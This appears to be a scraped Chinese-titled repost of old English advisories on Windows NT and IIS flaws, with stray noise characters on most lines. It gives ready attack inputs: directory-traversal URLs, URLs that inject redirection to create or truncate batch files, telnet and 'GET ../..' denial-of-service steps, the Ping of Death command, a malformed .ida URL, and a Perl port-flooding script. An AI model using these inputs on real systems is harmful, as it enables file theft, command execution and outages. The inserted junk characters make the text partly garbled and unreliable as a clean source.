NT的漏洞及描述(英文）

受影响系统:4.0,iis 1.0
3 F8 U; C1 K5 ^8 X/ A6 PA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
0 ^/ }5 d7 l( r$ j, u
# E% Y+ H5 O0 {/ U9 F9 EA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

8 W# m% A. @/ e7 y' f8 `By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

" O) ^% D3 P) Y) P--------------------------------------------------------------------

+ _% ?: Y0 u4 \受影响系统:4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
. G1 L4 W- Y3 s2 x
8 B9 {- ^. X7 I# hIf the file 'target.bat' exists, the file will be truncated.
' Y6 Z4 _% `/ j2 F( ^" g* G
5 y) E' v& q; U1 M$ i/ h
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

----------------------------------------------------------------------
9 q# c: T' Q% U
8 F8 L: Q  G( y* Z/ A受影响系统:3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.

The following steps;

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
9 L3 B8 K( t% _+ ^' G2 Wresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
4 M& j9 N  c5 l: N, j
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
% F* b, \$ J- E$ r2 D
3 Q# D" j' P/ h6 l3 U1 s8 fThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

' T" b- t5 k% a6 QIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
" m) L6 h% u# m* H
3 V3 |0 y' u* h# \( x' n: EThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

; m) m0 V4 f6 n/*begin poke code*/

use Socket;
use FileHandle;
/ D" B$ Q# j' D, ~2 i3 Brequire "chat2.pl";
. \7 }0 ~2 H3 l5 s
$systemname = $ARGV[0] && shift;
+ {+ U* _8 g4 p* w9 R/ i5 l% a
' j+ b7 r, e2 `* S2 h  c$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
{


* f" u+ O1 M0 e  u; O  m. B# Q7 z3 e+ Bif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
  K/ |! K8 o7 G8 B$ O0 p% Fnext;
+ g/ X( G. N- d  s}
4 Z! i9 e& Y! x$ k9 V$ v5 O) h& i$fh = chat::open_port($systemname, $port);
chat::print ($fh,"This is about ten characters or more");
if ($verbose) {
; ~8 o; v8 O7 q* S# ]2 G8 kprint "Trying port: $port\n";
  e9 K4 ?" {5 ~}
chat::close($fh);

$ r0 Y) {3 v- }& A}
3 l  y' \, o  B

/*end poke code*/
* k3 h6 V. I. V
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

* b' o' c' X4 o# U# _% J--------------------------------------------------------------------------------

受影响系统:4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

4 m, l0 I5 Q  [( i+ o9 D" VThis attack causes Dr. Watson to display an alert window and to log an error:

4 L4 q0 m* [- B+ N8 y3 ]3 _"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
, o  H& {/ l: t. c( x+ @0 `4 l6 ~" q
--------------------------------------------------------------------------------
8 j1 c) {2 @- q, y: u1 Y
) a; C$ b, U4 C2 D受影响系统:3.51,4.0
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
! m% r9 w; V/ `' \$ g" _
STOP: 0X0000001E
# b: s0 I" `2 K) ]6 Y5 IKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
# p" q5 y# ^; x1 w5 G' `
5 u. P- @( B7 ^4 ?7 z* f: ]-OR-
: I' B' }. o' ]5 ?% u
STOP: 0x0000000A
# P* W* @5 J0 S4 N8 RIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
) I  j+ r: t' I* @
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.

1 \( r1 i4 ]3 ~: Y--------------------------------------------------------------------------------
  v; o/ r: \: x# \5 J- f8 }' f9 Z  m
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
* {' c1 e6 |5 S( i4 [# Y* _" Q
--------------------------------------------------------

- d+ B; z# e2 o$ s7 VIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server